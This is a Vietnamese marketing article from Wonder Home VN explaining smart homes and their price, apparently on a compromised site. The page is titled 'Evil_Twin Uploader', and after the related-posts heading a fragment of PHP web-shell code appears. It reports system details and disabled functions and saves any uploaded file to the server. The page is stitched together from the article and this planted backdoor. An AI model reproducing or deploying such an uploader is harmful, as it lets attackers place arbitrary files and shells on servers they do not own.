Evil_Twin Uploader

Smart Home là gì? Smart Home giá bao nhiêu?

Smart Home đang là phong cách thiết kế nhà được rất nhiều người để ý tới. Trong cuộc sống bộn bề ngày nay, việc sống trong một ngôi nhà thông minh sẽ giúp bạn tiết kiệm thời gian công sức, giúp bạn tận hưởng những giờ phút nghỉ ngơi thư giãn thoải mái nhất. Smart Home sẽ là xu thế của tương lai, nơi trí tuệ thông minh nhân tạo sẽ hỗ trợ đắc lực cho con người trong cuộc sống.

Smart Home là gì

Smart Home là gì?

Hiện nay, Smart Home là khái niệm vẫn chưa được định nghĩa hoàn chỉnh. Tuy nhiên nếu hiểu đơn giản Smart Home là ngôi nhà có thể hiểu được và vận hành các thiết bị theo mong muốn của chủ nhà. Với những ngôi nhà được trang bị giải pháp nhà thông minh, bạn hoàn toàn có thể điều khiển, kiểm soát thiết bị điện chiếu sáng, rèm cửa tự động hay điều hòa, bình nóng lạnh,…

Không chỉ có chức năng điều khiển các thiết bị nhà thông minh Smart Home còn mang lại sự bảo mật, an toàn tuyệt đối. Khi chủ nhà đi công tác hay du lịch ở đâu đó, họ vẫn có thể biết được ngôi nhà mình hiện tại đang như thế nào thông qua hệ thống camera IP giám sát. Ngoài ra sẽ có cảnh báo tới smartphone khi có sự xâm nhập không mong muốn thông qua các thiết bị cảm biến chuyển động, cảm biến cạy mở cửa,…

Smart Home là gì

Smart Home với những trải nghiệm tuyệt vời sẽ mang lại cho bạn sự sang trọng, sự khác biệt và đẳng cấp cho ngôi nhà bạn. Khi có khách vào chơi nhà, các thiết bị điện sẽ hoạt động dựa trên những kịch bản có sẵn. Ví dụ như rèm tự động mở ra, âm nhạc được bật tự động theo list bài hát ưa thích, hay đèn phòng khách sẵn sàng bật ngay khi cửa mở. Những yếu tố trên thực sự sẽ làm cho ngôi nhà của bạn trở thành Smart Home với nhiều tiện nghi.

Smart Home giá bao nhiêu?

Theo suy nghĩ của nhiều người, Smart Home hiện đại, sang trọng, ứng dụng công nghệ cao chắc hẳn phải có giá vô cùng đắt đỏ. Tuy nhiên với sự phát triển của công nghệ, điều đó làm thay đổi hoàn toàn suy nghĩ của con người. Nếu bạn am hiểu về nhà thông minh, bạn sẽ có thể nhận được rất nhiều báo giá từ rất nhiều đơn vị khác nhau. Tuy nhiên, để tìm được đơn vị cung cấp giải pháp Smart Home giá rẻ mà chất lượng thì không phải dễ.

Smart Home là gì

Các thiết bị thông minh Smart Home của CÔNG TY CỔ PHẦN WONDER HOME VN đều được niêm yết giá tại tất cả các đại lý chi nhánh trên toàn quốc. Chỉ từ 30-50 triệu đồng, ngôi nhà của bạn đã có thể trở thành Smart Home với những tiện ích cực kỳ hấp dẫn. Chúng tôi tự hào với Công nghệ không dây ZigBee có thể biến mọi hạ tầng, mọi ngôi nhà đều có thể trở thành nhà thông minh mà không ảnh hưởng đến kết cấu ngôi nhà. Tuy nhiên, mỗi ngôi nhà khác nhau sẽ có nhu cầu sử dụng và diện tích sử dụng khác nhau.

Giờ đây, chỉ với khoản đầu tư không quá lớn bạn đã có thể biến ngôi nhà mình trở thành Smart Home. Liên hệ với chúng tôi ngay hôm nay qua Hotline: 024.6688.7518 – 0963.493.586 để được tư vấn miễn phí.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial